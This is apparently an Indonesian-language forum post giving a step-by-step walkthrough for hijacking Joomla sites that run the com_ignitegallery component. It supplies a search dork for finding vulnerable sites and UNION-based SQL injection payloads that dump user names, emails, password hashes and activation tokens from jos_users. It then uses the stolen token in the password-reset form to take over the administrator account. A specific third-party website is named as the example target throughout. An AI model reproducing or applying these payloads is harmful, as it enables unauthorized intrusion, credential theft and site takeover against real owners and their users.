0 Exploit Joomla

ga sengaja tadi jalan2 nemu exploit, bagi yang udah tau maaf
yah ane hanya ingin berbagi aja, berbagi itu indah :D
jangan malas
yah cari di goolge :D ======
=step1=
======

coba
kita cari di google dengan dork ini :
inurl:"index.php
option=com_ignitegallery"
======
=step2=
======

pasang
exploitnya exploit :
index.php?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1,2,group_concat(id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,usertype),4,5,6,7,8,9,10+from+jos_users--

contoh
: http://www.kaikourafishing.co.nz/index.php?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1,2,group_concat%28id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,usertype%29,4,5,6,7,8,9,10+from+jos_users--

nah
muncul kan tuh :D
======
=step3=
======

coba
kita reset password nya
sekarang kita reset
password dengan menggunakan exploit ini : /index.php?option=com_user&view=reset


hm..
minta email dia.. masukin aja email admin tadi..
enter
deh :D
======
=step4=
======

wah
minta activation pula, tenang kita cari dulu activationnya :D
exploit
: index.php?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1,2,group_concat(id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,activation),4,5,6,7,8,9,10+from+jos_users--


tuh
kan kluar activatifasinya :D
======
=step5=
======

copas
aja ke yang tadi lalu enter :D
======
=step6=
======

sekarang
meminta password baru :D
======
=step7=
======

oke
langsung ke taham berikutnya, sekarang kita masuk ke adminnya http://www.kaikourafishing.co.nz/administrator/